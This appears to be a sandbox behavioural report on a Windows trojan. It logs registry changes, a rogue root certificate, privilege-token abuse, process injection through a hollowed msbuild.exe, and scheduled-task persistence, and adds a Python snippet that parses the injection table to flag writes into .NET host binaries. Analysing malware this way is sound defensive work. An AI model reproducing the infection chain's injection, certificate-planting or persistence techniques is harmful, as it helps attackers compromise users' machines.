Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A

Suspicious behavior: EnumeratesProcesses

Count Description Indicator Process Target
1 N/A N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
5 N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
2 N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
2 N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
6 N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
10 N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
10 N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
21 N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
6 N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
1 N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Count Description Indicator Process Target
8 PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
3 PID 2156 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
3 PID 2468 wrote to memory of 768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
2 PID 2468 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
3 PID 2468 wrote to memory of 1756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
3 PID 2468 wrote to memory of 2164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
3 PID 1756 wrote to memory of 3936 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
3 PID 2164 wrote to memory of 4936 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3 PID 768 wrote to memory of 1572 N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe C:\Windows\System32\Conhost.exe
3 PID 2468 wrote to memory of 3208 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
3 PID 3208 wrote to memory of 3748 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
3 PID 3208 wrote to memory of 4504 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
3 PID 3208 wrote to memory of 1164 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
3 PID 1164 wrote to memory of 1996 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
3 PID 4364 wrote to memory of 748 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3 PID 4804 wrote to memory of 2108 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2 PID 4364 wrote to memory of 2672 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
2 PID 2672 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
2 PID 4804 wrote to memory of 2484 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\system32\cmd.exe
2 PID 2484 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
3 PID 4804 wrote to memory of 3596 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1 PID 4364 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
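The WriteProcessMemory table records one row per call, so the process tree and the number of writes per parent/child pair have to be reconstructed from it. The Python below is an added example and not part of the sandbox report: it parses a subset of the rows above, rebuilds the parent-child graph from who wrote into whom, and lists writes from images outside C:\Windows into signed .NET host binaries such as msbuild.exe. The INJECTION_HOSTS watch-list and the "source outside C:\Windows" condition are assumptions of the example, not classifications the sandbox makes.

```python
import re
from collections import Counter, defaultdict

# Image paths exactly as they appear in the table above.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
LDUE = r"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
NQOL = r"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
PKFQX = r"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe"
PWSH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed input: a subset of the WriteProcessMemory rows above as
# (description, source image, target image), repeated once per logged event.
ROWS = (
    [("PID 2156 wrote to memory of 2468", DROPPER, MSBUILD)] * 8
    + [("PID 2156 wrote to memory of 220", DROPPER, MSBUILD)] * 3
    + [("PID 2468 wrote to memory of 1756", MSBUILD, LDUE)] * 3
    + [("PID 2468 wrote to memory of 2164", MSBUILD, NQOL)] * 3
    + [("PID 2468 wrote to memory of 3208", MSBUILD, PKFQX)] * 3
    + [("PID 2164 wrote to memory of 4936", NQOL, PWSH)] * 3
)

ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)")

# Signed Windows/.NET binaries commonly used as hosts for injected payloads
# (assumed watch-list for this example, not something the report defines).
INJECTION_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe",
                   "installutil.exe", "aspnet_compiler.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(rows):
    """Turn table rows into (src_pid, dst_pid, src_image, dst_image) edges."""
    edges = []
    for desc, src_img, dst_img in rows:
        m = ROW_RE.fullmatch(desc.strip())
        if not m:
            raise ValueError(f"unparsed row: {desc!r}")
        edges.append((int(m.group(1)), int(m.group(2)), src_img, dst_img))
    return edges


def write_counts(edges):
    """Number of WriteProcessMemory events per (src_pid, dst_pid) pair."""
    return Counter((s, d) for s, d, _, _ in edges)


def injection_host_writes(edges):
    """Edges where an image outside C:\\Windows writes into a known host binary.

    Returns sorted (src_pid, dst_pid, src_name, dst_name, event_count). In this
    report an ordinary child launch shows up as 3 writes, so a higher count on
    such an edge is the stronger hollowing signal.
    """
    counts = write_counts(edges)
    images = {(s, d): (si, di) for s, d, si, di in edges}
    hits = []
    for (s, d), n in counts.items():
        src_img, dst_img = images[(s, d)]
        if (basename(dst_img) in INJECTION_HOSTS
                and not src_img.lower().startswith("c:\\windows\\")):
            hits.append((s, d, basename(src_img), basename(dst_img), n))
    return sorted(hits)


def process_tree(edges):
    """Parent -> [(child_pid, child_name)] built only from who wrote into whom."""
    tree = defaultdict(list)
    seen = set()
    for s, d, _, dst_img in edges:
        if (s, d) not in seen:
            seen.add((s, d))
            tree[s].append((d, basename(dst_img)))
    return dict(tree)


def render(tree, root, label, depth=0):
    """Indented text rendering of the subtree under root."""
    lines = [f"{'  ' * depth}{root} {label}"]
    for child, name in tree.get(root, []):
        lines.extend(render(tree, child, name, depth + 1))
    return lines


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    print("\n".join(render(process_tree(edges), 2156, basename(DROPPER))))
    for hit in injection_host_writes(edges):
        print("write into injection host:", hit)
```

Run stand-alone it prints the tree rooted at the dropper (PID 2156) and flags both msbuild.exe instances. The 8 writes into PID 2468 stand out against the 3 writes that every ordinary child launch in the table produces, and it is that hollowed msbuild.exe, not the dropper, which then launches every payload in C:\Users\Admin\Pictures.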

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe

"C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe"

C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe

"C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"

C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe

"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ulc.0.exe

"C:\Users\Admin\AppData\Local\Temp\ulc.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1572 -ip 1572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 1020

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --silent --allusers=0

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

